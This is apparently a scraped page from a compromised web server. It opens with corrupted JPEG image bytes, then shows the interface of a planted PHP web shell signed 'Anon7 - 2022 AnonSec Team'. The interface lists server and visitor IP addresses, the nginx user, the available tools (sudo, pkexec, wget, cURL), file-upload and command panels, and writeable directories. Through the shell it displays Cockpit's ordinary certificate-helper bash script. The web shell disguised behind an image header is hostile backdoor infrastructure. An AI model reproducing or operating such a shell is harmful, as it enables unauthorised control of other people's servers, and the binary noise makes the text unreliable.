JFIF # -$)%7&).0444#9?92>-240 5+#+4;224;652252222225222220222522225222522;2225222222"B!1AQa"q2B#R3br5CS/!12AQ"aRq#3 ??;}q7:bd%Ո>L8/$rsrQٷf=+e: Rb0Z6pN۰7b 1S`JAT K,-֥7(bNRb9CsD/s,9?}+KA]`,EΞ@@ 3ukq14""tD@D@D@D@D@D@D@D@D@D@D@ȓ|:^Yw-)G%AI/9pwVSнm@6=g7AA5tg18gj>F'J,{C3(q<*#AzX?[$va:Q4SԽ7Uԥ&,c}nF;3mO$DN}RySm\*I"}b%7GLj;gp{{FYs(p_xOJFtStǸMU蓰s95"#H'Uq>7F5[}>v%'Y,&CqMzn}m*Xo vl˳hrӦ V)))g`7$sz^%I-1leE]y%݉>?f}( *BNNñ𜤢S[i'T1 ӥԊ>NlHď~)pKw1.UsD LI/k]Sr\r=ߴMAZNKi+P}| qBS*G*z:Imk\_|l6A7߉H\z0賈'Zt_\u>4 {\#O[ERxzLvP wOLT C0ȴ]BAʷ7uNNINS,(DDDDDDDL8MY݂N$ dMK׭i2FesmNQ=?omKv]OVl^@&pɴ[t5+E`oy.E]Ϳ}$g(7y7&X+imcT\(cHɤ|=. C =yȗXʧpv=&cX*[X_i4 GtfFՓnbMjR@ thv4LO I0zlU-_*G!cH9`nԿ \k-~rS*c[}9]qbi~+%)(h($ s;dՒG_\ё[Q,plq!pEſA RZU0*\n]a~Md_3EZ { &8e:jR*dAkyۛs\B˞0Z5%6e`3;0slSx+Xȇ"*ozkE"vܬWاQ8r @ m5$ [/KNFycgrۑ@ {""""""|xd*@s7o~7BSG|܎vøGtЍL١ѬnK/, f~^~l/Ij+!JI'^;{˚*hӤJarʮ)ڱ[P^$;%.V FLJW̔?2ԭUpJe,~b%iW Yhz̻FAl|3ln"M4kM@$2wmͣp8JY)ݬ.]3vԩİ(P*Tb/1FXTg KŮ*C9jE[69d!GZȩMu!5`H\Cp"=wSAmJjCn&/*Q[kQ~b"zΕ~)aA(2EZ0(FÑp.66_φk}T5 YdRarK ɽLSj"SnR-N-Mz~F^Igb Jq(~X fH'Ӵp5_HN(ܰ,Ȍ䶛DK%a~?FuI}"p=U+j}'p&I_ɑ-x!IٮM:w|q;9M?.6x:ODѪ̬zTL`t^?8xJ$ Q cL4d/_xy ˔ SPGNgwSrrS/`5ӧKj ,hTpI=LѦ(,Pc4*4iESO?5sMz<`&_bsTO)fkX[ xqq::h9ifVۉ\_R }JVg~Jzm`(]:O &6IOghX6+HM 7X]RkUr{HL-"< >~28b{[><@6gF5&\1̹nVŕonZM7 (SF$l\sM];owE+IֹȫzɲDߌPcMQMG)b,N ;*!uo&rHT`s^7įĴz0?P&Ҫ3]@H:hڢFҢM~p{&0s?k}+Ι9׵mw >?"fs+Odٯ̌m(R9T:UpbkW=F*ZQh urk8C8@ҧeUԀyKS '.UP,NBcpFS6n=AJl*7 4<(XY_Cda/D=()b,{yHL>[jrǹ7#M7fO`o/w]GȈEU2f\?7a)#봙݂͠SEg>VRdPfF@PV"Ꮷ_(qCJG_0?1[% NKu$7&ۭ ߡ26U$`/ 3ES:/nek |\tmSg5 س}6/qDT "(*sP4SrX)%T(6y%_ Z9<%]B}oyyY"]76*U*vjijw i3D̍IS \Jnn9ۋ>%o;~)5u56槡'z* B5#5

5#a`,>1TW{Xɘ}G4"ҕ4z5F>e6*[\;%*U0LUUr2cpnݢkɜY͌3+bG0#el۴oe,,jO*M1X/3z)W^,p>s{ İQs:ޝd|w :fIe$~+ajXjnT80'S>KIUP&kNϒT=XlȞNڞ]Yz_K[Qׂގ\gq!nB@IoG *l;_뼳\RUeэkm)qh傢5KNz٘6ba:671k{  $N vfN]S7gxg=VjG;wBx t~l/"ʭl=ԝ6n[Dٛ]@"x)# E):\8Bvkcpv4O*;coJ?4ªMCA'.\zVð'w1USݻSlTyj/ gʕ,:S')ܴ]7!A^b%P׶ٮհU3 o\}XTp,e 597n}dk6UFrVǧ3qaR:BWn>Ѻ}oxKӦK)kܑKL tCs1#?升 v{r:u)?#ZxM=ڝYـ#e}JHBGTG>GsܞG2+~R̅Hש)$[*Hfx-ugx({ I7λwvYm~ |e'X#db@hW,0H8*J5AъA`;jȊY*&sh8Jn]"M>l3z%Րsy=Um'qF sX %,Uv|0W`Gzcy*V0'3R`5ޓ Hڙ>PWbw7;)[U(:krm>/ QU+)P>Hm!r -evY>wT7ԝe)^6_SN⚓ϫ('?2Sj5,[پd|+_Pv'[]t'mΝ2l}z/dz^E|"'J qED)R2ƂSg`9Ոu5~ d!G%>M6%pdcP-P L`ϼTQnA_,24G GneRn,XnߕSzV$ReBfZuE ,Z(yi?vO!clOYA [; c I|vCom+Hꡤ\eaӴ;XS|v4%FcϷAQ[yϢ_s+Ơ&pt}=%^Sb"#gĀ'[ oAUPzr;ȔZTy4t>f種ً>T؟GRgC^-WЖukS,G LV$ܱO餰%cp)[*X_v$@DDӢ3bE-V0֍?zySyadd\ j5": Bxi?;3a]1]ZFD澙rc|8uz/ CȎ3UTqb4'ҥX 6KʖYT2fPe$6 lGzSQTP} OL1q^*rxջQ_K?'?=V MR K IS HERE

MRKShell
Server IP : 104.21.73.244  /  Your IP : 104.23.243.56
Web Server : nginx/1.14.1
System : Linux comtuc2-s-2vcpu-8gb-160gb-intel-nyc3 4.18.0-348.7.1.el8_5.x86_64 #1 SMP Wed Dec 22 13:25:12 UTC 2021 x86_64
User : nginx ( 991)
PHP Version : 7.2.34
Disable Function : NONE
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : ON  |  Sudo : ON  |  Pkexec : ON
Directory :  /proc/self/root/proc/self/root/usr/libexec/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ HOME SHELL ]     

Current File : /proc/self/root/proc/self/root/usr/libexec/cockpit-certificate-helper
#!/bin/bash

set -eu

# prefix= is set because the default /etc contains "${prefix}"
prefix="/usr"
COCKPIT_GROUP="cockpit-ws"
COCKPIT_CONFIG="/etc/cockpit"
COCKPIT_WS_CERTS_D="${COCKPIT_CONFIG}/ws-certs.d"
COCKPIT_RUNTIME_DIR="/run/cockpit"

install_cert() {
    local destination="${COCKPIT_WS_CERTS_D}/$1"
    mv -Z "$1" "${destination}"

    # The certificate should be world-readable
    chmod a+r "${destination}"
}

install_key() {
    local destination="${COCKPIT_WS_CERTS_D}/$1"
    mv -Z "$1" "${destination}"

    # If COCKPIT_GROUP is set, then make sure the key is readable by that group too
    if [ -n "${COCKPIT_GROUP}" ]; then
        chown root:"${COCKPIT_GROUP}" "${destination}"
        chmod g+r "${destination}"
    fi
}

selfsign_sscg() {
    sscg --quiet \
        --lifetime "${DAYS}" \
        --key-strength 2048 \
        --cert-key-file "${KEYFILE}" \
        --cert-file "${CERTFILE}" \
        --ca-file "${CA_FILE}" \
        --hostname "${HOSTNAME}" \
        --organization "${MACHINE_ID}" \
        --subject-alt-name localhost \
        --subject-alt-name IP:127.0.0.1/255.255.255.255
}

selfsign_openssl() {
    openssl req -x509 \
        -days "${DAYS}" \
        -newkey rsa:2048 \
        -keyout "${KEYFILE}" \
        -keyform PEM \
        -nodes \
        -out "${CERTFILE}" \
        -outform PEM \
        -subj "${MACHINE_ID:+/O=${MACHINE_ID}}/CN=${HOSTNAME}" \
        -config - \
        -extensions v3_req << EOF
    [ req ]
    req_extensions = v3_req
    extensions = v3_req
    distinguished_name = req_distinguished_name
    [ req_distinguished_name ]
    [ v3_req ]
    subjectAltName=IP:127.0.0.1,DNS:localhost
    basicConstraints = critical, CA:TRUE
    keyUsage = critical, digitalSignature,cRLSign,keyCertSign,keyEncipherment,keyAgreement
    extendedKeyUsage = serverAuth
EOF
}

cmd_selfsign() {
    # Common variables used by both methods
    local MACHINE_ID
    MACHINE_ID="$(tr -d -c '[:xdigit:]' < /etc/machine-id)"
    local HOSTNAME="${HOSTNAME:-$(hostname)}"
    local CERTFILE="0-self-signed.cert"
    local KEYFILE="0-self-signed.key"
    local CA_FILE="0-self-signed-ca.pem"

    # We renew certificates up to 30 days before expiry, so give ourselves a
    # year, plus 30 days.  The maximum is variously mentioned to be 397 or 398.
    local DAYS=395

    # If sscg fails, try openssl
    selfsign_sscg || selfsign_openssl

    # Install the files and set permissions ($CA_FILE is only created by sscg)
    test ! -e "${CA_FILE}" || install_cert "${CA_FILE}"
    install_cert "${CERTFILE}"
    install_key "${KEYFILE}"
}

cmd_ipa_request() {
    local USER="$1"

    # IPA operations require auth; read password from stdin to avoid quoting issues
    # if kinit fails, we can't handle this setup, exit cleanly
    kinit "${USER}@${REALM}" || exit 0

    # ensure this gets run with a non-C locale; ipa fails otherwise
    if [ "$(sh -c 'eval `locale`; echo $LC_CTYPE')" = 'C' ]; then
        export LC_CTYPE=C.UTF-8
    fi

    # create a kerberos Service Principal Name for cockpit-ws, unless already present
    ipa service-show "${SERVICE}" || \
        ipa service-add --ok-as-delegate=true --ok-to-auth-as-delegate=true --force "${SERVICE}"

    # add cockpit-ws key, unless already present
    klist -k "${KEYTAB}" | grep -qF "${SERVICE}" || \
        ipa-getkeytab -p "HTTP/${HOST}" -k "${KEYTAB}"

    # request the certificate (into the working directory)
    ipa-getcert request -f 10-ipa.cert -k 10-ipa.key -K "HTTP/${HOST}" -w -v

    # install it into /etc
    install_cert 10-ipa.cert
    install_key 10-ipa.key
}

cmd_ipa_cleanup() {
        # clean up keytab
        if [ -e "${KEYTAB}" ]; then
            ipa-rmkeytab -k "${KEYTAB}" -p "${SERVICE}"
        fi

        # clean up certificate
        ipa-getcert stop-tracking -f 10-ipa.cert -k 10-ipa.key
        rm "${COCKPIT_WS_CERTS_D}/10-ipa.cert" "${COCKPIT_WS_CERTS_D}/10-ipa.key"
}

cmd_ipa() {
    local REALM="$2"

    local HOST
    HOST="$(hostname -f)"
    local SERVICE="HTTP/${HOST}@${REALM}"
    local KEYTAB="${COCKPIT_CONFIG}/krb5.keytab"

    # use a temporary keytab to avoid interfering with the system one
    export KRB5CCNAME=/run/cockpit/keytab-setup

    # not an IPA setup? cannot handle this
    if [ -z "$(which ipa)" ]; then
        echo 'ipa must be installed for this command'
        exit 1
    fi

    case "$1" in
        request)
            cmd_ipa_request "$3"
            ;;
        cleanup)
            cmd_ipa_cleanup
            ;;
        *)
            echo 'unknown subcommand'
            exit 1
            ;;
    esac
}

main() {
    # ipa-getkeytab needs root to create the file, same for cert installation
    if [ "$(id -u)" != "0" ]; then
        echo 'must be run as root'
        exit 1
    fi

    # Create a private working directory
    mkdir -p "${COCKPIT_RUNTIME_DIR}"
    WORKDIR="${COCKPIT_RUNTIME_DIR}/certificate-helper"
    mkdir -m 700 "${WORKDIR}" # we expect that not to have existed
    trap 'exit' INT QUIT PIPE TERM
    trap 'rm -rf "${WORKDIR}"' EXIT
    cd "${WORKDIR}"

    # Dispatch subcommand
    case "$1" in
        selfsign)
            cmd_selfsign
            ;;
        ipa)
            shift
            cmd_ipa "$@"
            ;;
        *)
            echo 'unknown subcommand'
            exit 1
            ;;
    esac
}

main "$@"

Anon7 - 2022
AnonSec Team